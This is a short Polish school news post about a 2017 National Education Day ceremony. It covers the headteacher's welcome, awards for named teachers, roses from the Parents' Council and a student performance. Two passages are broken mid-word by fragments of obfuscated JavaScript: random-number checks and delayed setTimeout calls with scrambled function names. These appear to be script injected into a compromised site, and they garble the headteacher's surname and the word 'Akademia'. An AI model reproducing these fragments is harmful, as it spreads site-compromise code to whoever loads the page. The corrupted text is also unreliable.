Dzień Edukacji Narodowej

Dnia 16 października 2017r. uroczyście obchodziliśmy w naszej szkole Dzień Edukacji Narodowej. Najpierw głos zabrała Pani Dyrektor Ewa Redom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decka, która powitała wszystkich zebranych. Szczególnie ciepło zwróciła się do nauczycieli, zaproszonych gości i pracowników obsługi szkoły, życząc im sukcesów w pracy oraz wszelkiej pomyślności. Następnie za osiągnięcia w pracy dydaktycznej, wychowawczej i opiekuńczej zostali wyróżnieni i nagrodzeni nauczyciele: p. Justyna Tomaszewska, p. Magdalena Domańska, p. Ewa Golis , p. Radosław Ulicki. Słowa podziękowania skierowała również w stronę nauczycieli przewodnicząca Rady Rodziców – p. Katarzyna Ostrowska .
Wszyscy nauczyciele otrzymali symboliczną różę – upominek od Rady Rodziców. Kolejnym punktem uroczystości był humorystyczny montaż słowno – muzyczny przygotowany przez uczniów pod opieką p. Małgorzaty Karwowskiej . O oprawę muzyczną i przygotowanie wokalne artystów zadbała p. Ewa Golis.
Akadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}demia z okazji Dnia Edukacji Narodowej przebiegła w miłej, a jednocześnie podniosłej atmosferze. Wszyscy byli bardzo zadowoleni a efekty uroczystości spełniły zamierzone cele organizatorów.